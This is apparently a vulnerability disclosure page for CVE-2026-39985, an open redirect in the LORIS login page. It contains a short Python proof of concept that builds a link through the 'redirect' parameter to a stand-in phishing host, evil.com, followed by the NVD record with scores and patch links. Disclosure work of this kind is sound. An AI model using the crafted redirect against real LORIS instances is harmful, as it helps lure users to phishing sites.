CVE-2026-39985

# Proof of Concept (PoC) for CVE-2026-39985 # Description: Exploits the open redirect vulnerability via the login redirect parameter. import urllib.parse def generate_malicious_url(base_url, evil_site): """ Generates a malicious LORIS login URL that redirects to an external site. """ # The vulnerable parameter is 'redirect' payload = { 'redirect': evil_site } # Encode the parameters query_string = urllib.parse.urlencode(payload) # Construct the full URL malicious_url = f"{base_url}?{query_string}" return malicious_url if __name__ == "__main__": target = "https://example-loris-instance.com/login" redirect_target = "http://evil.com/phishing" poc_url = generate_malicious_url(target, redirect_target) print(f"[+] Generated Malicious URL: {poc_url}") print(f"[+] Victim will be redirected to: {redirect_target}")

{"cve": {"id": "CVE-2026-39985", "sourceIdentifier": "[email protected]", "published": "2026-04-09T18:17:02.653", "lastModified": "2026-04-22T00:24:34.970", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. Prior to 27.0.3 and 28.0.1, the redirect parameter upon login to LORIS was not validating the value of the redirect as being within LORIS, which could be used to trick users into visiting arbitrary URLs if they are given a link with a third party redirect parameter. This vulnerability is fixed in 27.0.3 and 28.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mcgill:loris:*:*:*:*:*:*:*:*", "versionEndExcluding": "27.0.3", "matchCriteriaId": "F04A492D-D20B-4349-B01E-18EC44C8E400"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mcgill:loris:28.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D358B66A-04AC-44F2-8EF6-4332D8AC00F4"}]}]}], "references": [{"url": "https://github.com/aces/Loris/commit/f57f54b42a076bf53ba86e20d4dbf37f63538f58", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/aces/Loris/releases/tag/v27.0.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/aces/Loris/releases/tag/v28.0.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/aces/Loris/security/advisories/GHSA-rch2-f5fw-cg95", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}